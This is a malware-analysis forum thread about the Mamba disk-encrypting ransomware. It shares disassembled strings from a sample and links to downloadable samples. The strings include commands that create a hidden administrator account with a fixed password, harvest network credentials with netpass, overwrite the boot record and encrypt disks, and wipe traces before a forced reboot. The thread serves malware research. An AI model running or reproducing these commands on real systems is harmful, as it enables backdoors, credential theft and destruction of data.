A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #29250  by Artilllerie
 Tue Sep 20, 2016 8:31 am

Attached two samples relating to this report :
https://www.linkedin.com/pulse/mamba-ne ... k-articles

Some interested extract from 141.exe :
00401E44 MOV ECX,OFFSET 004258B4 ASCII "Checking resources existence. They are OK..."
00401E53 MOV ECX,OFFSET 004258E4 ASCII "copy resource file..."
00401E83 PUSH OFFSET 004258FC UNICODE "32dcrypt.sys"
00401E88 MOV EDX,OFFSET 00425850 UNICODE "dcrypt.sys"
00401E96 PUSH OFFSET 00425918 UNICODE "32dcrypt.exe"
00401E9B MOV EDX,OFFSET 00425934 UNICODE "dcrypt.exe"
00401EB0 PUSH OFFSET 0042594C UNICODE "32dcinst.exe"
00401EB5 MOV EDX,OFFSET 00425968 UNICODE "dcinst.exe"
00401EC8 PUSH OFFSET 00425980 UNICODE "32dccon.exe"
00401ECD MOV EDX,OFFSET 00425998 UNICODE "dccon.exe"
00401EE0 PUSH OFFSET 004259AC UNICODE "32dcapi.dll"
00401EE5 MOV EDX,OFFSET 004259C4 UNICODE "dcapi.dll"
00401EF8 PUSH OFFSET 004259D8 UNICODE "Mount.exe"
00401EFD MOV EDX,OFFSET 004259D8 UNICODE "Mount.exe"
00401F0B PUSH OFFSET 004259EC UNICODE "32netpass.exe"
00401F1D PUSH OFFSET 00425A20 UNICODE "64dcrypt.sys"
00401F22 MOV EDX,OFFSET 00425850 UNICODE "dcrypt.sys"
00401F30 PUSH OFFSET 00425A3C UNICODE "64dcrypt.exe"
00401F35 MOV EDX,OFFSET 00425934 UNICODE "dcrypt.exe"
00401F4A PUSH OFFSET 00425A58 UNICODE "64dcinst.exe"
00401F4F MOV EDX,OFFSET 00425968 UNICODE "dcinst.exe"
00401F62 PUSH OFFSET 00425A74 UNICODE "64dccon.exe"
00401F67 MOV EDX,OFFSET 00425998 UNICODE "dccon.exe"
00401F7A PUSH OFFSET 00425A8C UNICODE "64dcapi.dll"
00401F7F MOV EDX,OFFSET 004259C4 UNICODE "dcapi.dll"
00401F92 PUSH OFFSET 004259D8 UNICODE "Mount.exe"
00401F97 MOV EDX,OFFSET 004259D8 UNICODE "Mount.exe"
00401FA5 PUSH OFFSET 00425AA4 UNICODE "64netpass.exe"
00401FAC MOV EDX,OFFSET 00425A08 UNICODE "netpass.exe"
00401FF4 PUSH OFFSET 00425850 UNICODE "dcrypt.sys"
00402000 PUSH OFFSET 00425868 UNICODE "%s\drivers\%s"
0040202E MOV ECX,OFFSET 00425AC0 ASCII "driver installed before..."

004020A1 MOV ECX,OFFSET 00425AF4 ASCII "installing driver..."
004020AF PUSH OFFSET 00425B0C UNICODE "-setup"
004020B5 PUSH OFFSET 00425B1C UNICODE "open"
004020C7 MOV ECX,OFFSET 00425B28 ASCII "installing driver successfully.."
004020E9 MOV ECX,OFFSET 00425B4C ASCII "failed to copy file and exit.."
0040213B PUSH OFFSET 00425B6C UNICODE "SeShutdownPrivilege"
004021C7 PUSH OFFSET 00425DB0 UNICODE "DefragmentService"
004021CC PUSH OFFSET 00425DB0 UNICODE "DefragmentService"
004022FC PUSH OFFSET 00425BC0 ASCII "C:\DC22\netpass.txt"
00402313 MOV ECX,OFFSET 00425BD4 ASCII "getting share drive information..."
0040231D PUSH OFFSET 00425BF8 ASCII "schtasks /create /tn DefragmentService /TR "cmd.exe /c net use >> c:\dc22\netuse.txt" /sc DAILY"
00402331 PUSH OFFSET 00425C58 ASCII "schtasks /run /TN DefragmentService"
00402345 PUSH OFFSET 00425C7C ASCII "schtasks /delete /TN DefragmentService /F"
00402356 MOV ECX,OFFSET 00425BD4 ASCII "getting share drive information..."
00402360 PUSH OFFSET 00425CD8 ASCII "net user /add mythbusters 123456"
0040236D PUSH OFFSET 00425CFC ASCII "net localgroup administrators mythbusters /add"
0040237A PUSH OFFSET 00425D2C ASCII "cmd /c net use >> c:\dc22\netuse.txt"
00402387 PUSH OFFSET 00425CA8 ASCII "C:\DC22\netpass.exe /stab C:\DC22\netpass.txt"
004023A0 MOV DWORD PTR SS:[ESP+0C],OFFSET 00425D5>UNICODE "My Sample Service"
004023CE MOV ECX,OFFSET 00425D78 ASCII "Trying to create service..."
004023F5 PUSH OFFSET 00425D94 UNICODE ".exe"
00402409 PUSH OFFSET 00425DA0 UNICODE ".EXE"
0040249F MOV ECX,OFFSET 00425DD4 ASCII "creating service successfully. rebooting windows..."
004024DE MOV ECX,OFFSET 00425B98 ASCII "Password not set.exit"
004024F8 MOV ECX,OFFSET 00425E08 ASCII "starting serviceMain..."
00402502 MOV ECX,OFFSET 00425E20 ASCII "ServiceMain: Entry"
00402511 PUSH OFFSET 00425D54 UNICODE "My Sample Service"
00402525 MOV ECX,OFFSET 00425E34 ASCII "ServiceMain: RegisterServiceCtrlHandler returned error"
004025A2 MOV ECX,OFFSET 00425E6C ASCII "ServiceMain: SetServiceStatus returned error"
004025AC MOV ECX,OFFSET 00425E9C ASCII " ServiceMain: Performing Service Start Operations"
004025CD MOV ECX,OFFSET 00425ED0 ASCII "ServiceMain: CreateEvent(g_ServiceStopEvent) returned error"
00402615 MOV ECX,OFFSET 00425F0C ASCII " ServiceMain: SetServiceStatus returned error"
00402658 MOV ECX,OFFSET 00425E6C ASCII "ServiceMain: SetServiceStatus returned error"
00402677 MOV ECX,OFFSET 00425F3C ASCII "ServiceMain: Waiting for Worker Thread to complete"
0040268C MOV ECX,OFFSET 00425F70 ASCII "ServiceMain: Worker Thread Stop Event signaled"
00402696 MOV ECX,OFFSET 00425FA0 ASCII "ServiceMain: Performing Cleanup Operations"
004026E5 MOV ECX,OFFSET 00425E6C ASCII "ServiceMain: SetServiceStatus returned error"
004026EF MOV ECX,OFFSET 00425FCC ASCII "ServiceMain: Exit"
00402716 MOV ECX,OFFSET 00425FE0 ASCII "ServiceCtrlHandler: Entry"
00402725 MOV ECX,OFFSET 00425FFC ASCII "ServiceCtrlHandler: SERVICE_CONTROL_STOP Request"
00402775 MOV ECX,OFFSET 00426030 ASCII "ServiceCtrlHandler: SetServiceStatus returned error"
0040278B MOV ECX,OFFSET 00426064 ASCII "ServiceCtrlHandler: Exit"
004027BC MOV ECX,OFFSET 00426080 ASCII "ServiceWorkerThread: Entry"
0040282F MOV ECX,OFFSET 0042609C ASCII "Starting Mount app..."
00402849 PUSH OFFSET 004260B4 ASCII "C:\DC22\Mount.exe"
0040284E PUSH OFFSET 004260C8 ASCII "open"
0040286C PUSH OFFSET 004260D0 UNICODE "123456"
00402873 PUSH OFFSET 004260E0 UNICODE "mythbusters"
00402882 MOV ECX,OFFSET 004260F8 ASCII "LogonUserW_FAILURE"
004028EF PUSH OFFSET 00426128 UNICODE "C:\DC22\Mount.exe"
0040298F PUSH OFFSET 00426164 UNICODE "-boot -setmbr hd0"

004029A0 PUSH OFFSET 00425B1C UNICODE "open"
004029B4 MOV ECX,OFFSET 00426188 ASCII "start hard drive encryption..."
00402A79 PUSH OFFSET 00425B1C UNICODE "open"
00402B36 PUSH OFFSET 00425B1C UNICODE "open"
00402BEB PUSH OFFSET 00425B1C UNICODE "open"
00402CA6 PUSH OFFSET 00425B1C UNICODE "open"
00402D5B PUSH OFFSET 00425B1C UNICODE "open"
00402E16 PUSH OFFSET 00425B1C UNICODE "open"
00402ECB PUSH OFFSET 00425B1C UNICODE "open"
00402F86 PUSH OFFSET 00425B1C UNICODE "open"
0040303B PUSH OFFSET 00425B1C UNICODE "open"
004030F6 PUSH OFFSET 00425B1C UNICODE "open"
0040311A MOV ECX,OFFSET 00426310 ASCII "time limit passed.doing clean-up and reboot..."
0040313E MOV ESI,OFFSET 00426340 ASCII "/C ping -n 1 -w 3000 > Nul & sc delete DefragmentService & Del ""
004031CD MOV ESI,OFFSET 00426390 ASCII " & taskkill /im Mount.exe & Del "C:\DC22\Mount.exe" & Del "C:\DC22\netpass.txt" & Del "C:\DC22\netuse.txt" & Del "C:\DC22\netpass.exe" & net user /del mythbusters"
004031ED MOV ESI,OFFSET 00426438 ASCII " & shutdown /f /r /t 0"

00403200 PUSH OFFSET 00426450 ASCII "cmd"
00403207 PUSH OFFSET 004260C8 ASCII "open"
00403E00 PUSH OFFSET 00426454 ASCII "string too long"
004042E4 PUSH OFFSET 00426454 ASCII "string too long"
004042EE PUSH OFFSET 00426454 ASCII "string too long"
0040438F PUSH OFFSET 00426464 ASCII "invalid string position"
00404560 PUSH OFFSET 00425818 ASCII "C:\DC22\log_file.txt"
141.exe is a "file binder" :
Code: Select all
00000000: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
00029D50: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
00056218: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
00056B40: EXE MZ followed by PE - 'MZ\x00\x00f9\x05\x00\x0...x03\xc1\x818PE\x00\x00'
0007D540: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
0007E048: EXE MZ followed by PE - 'MZ\x00\x00f9\x05\x00\x0...x03\xc1\x818PE\x00\x00'
0007FF40: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
000807F3: EXE MZ followed by PE - 'MZ\x00\x00f9\x05\x00\x0...x03\xc1\x818PE\x00\x00'
0008F068: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
000BE268: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
000CC0D3: EXE MZ followed by PE - "MZ\x00\x00t\x12h\xc1\x0...8bU\xf8\x81:PE\x00\x00"
00118868: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
0014BF30: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
0014C681: EXE MZ followed by PE - 'MZ\x00\x00f9\x05\xa4\xe...89\x04$\x818PE\x00\x00'
00177A58: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
00178399: EXE MZ followed by PE - 'MZ\x00\x00f9\x05\xb4\xe...89\x04$\x818PE\x00\x00'
0017A058: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
0017A719: EXE MZ followed by PE - 'MZ\x00\x00f9\x054\xed\x...89\x04$\x818PE\x00\x00'
00188980: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
001BC580: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
001C4693: EXE MZ followed by PE - 'MZ\x00\x00t\x12\xb9\xc1...\x8bD$(\x818PE\x00\x00'
001D0A9E: EXE MZ followed by PE - 'MZ\x00\x00H\x8d=\xd7\xa...x03\xc7\x818PE\x00\x00'
0020D180: EXE MZ followed by PE - 'MZ\x90\x00\x03\x00\x00\...\x00\x00\x00PE\x00\x00'
pass : infected
(1.23 MiB) Downloaded 138 times
 #29256  by maximusdecimer
 Wed Sep 21, 2016 2:26 pm
They used DiskCrypt software to encrypt hard disks and patched dcapi.dll in its resources to display the boot message. The id itself was hard coded. Password lies in the service called "Defragment Service" as its parameters.